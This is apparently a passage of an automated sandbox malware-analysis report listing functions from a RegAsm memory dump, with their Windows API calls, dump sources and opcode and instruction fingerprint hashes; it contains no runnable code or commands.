                                                        Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateErrorLastMutex
                                                        • String ID: SG
                                                        • API String ID: 1925916568-3189917014
                                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                        • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                        • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                        • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                        • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                        • RegQueryValueExA.KERNEL32 ref: 00413587
                                                        • RegCloseKey.KERNEL32(?), ref: 00413592
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                        • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                        • RegCloseKey.KERNEL32(?), ref: 00413535
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                        • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                        • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID:
                                                        • API String ID: 1818849710-0
                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                        • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                        • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                        • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: pQG
                                                        • API String ID: 176396367-3769108836
                                                        • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                        • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2568140703-3893581201
                                                        • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                        • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                        Strings
                                                        • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                        • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                        • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                        • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                        • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                        • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                        • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2742660187-671089009
                                                        • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                        • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                        • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                        • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID: @
                                                        • API String ID: 1890195054-2766056989
                                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                        • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                        • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                        • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                        • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                          • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • _free.LIBCMT ref: 0044EFD0
                                                        • _free.LIBCMT ref: 0044F006
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                        • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                        • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                        • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                        • String ID:
                                                        • API String ID: 2279764990-0
                                                        • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                        • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                        • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                        • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEventStartupsocket
                                                        • String ID:
                                                        • API String ID: 1953588214-0
                                                        • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                        • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                        • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                        • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                        • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ForegroundText
                                                        • String ID:
                                                        • API String ID: 29597999-0
                                                        • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                        • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                        • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                        • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                        • String ID:
                                                        • API String ID: 1170566393-0
                                                        • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                        • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                        • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                        • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                        • String ID:
                                                        • API String ID: 806969131-0
                                                        • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                        • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                                                        • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                                                        • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __alldvrm
                                                        • String ID:
                                                        • API String ID: 65215352-0
                                                        • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                        • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                                                        • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                                                        • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
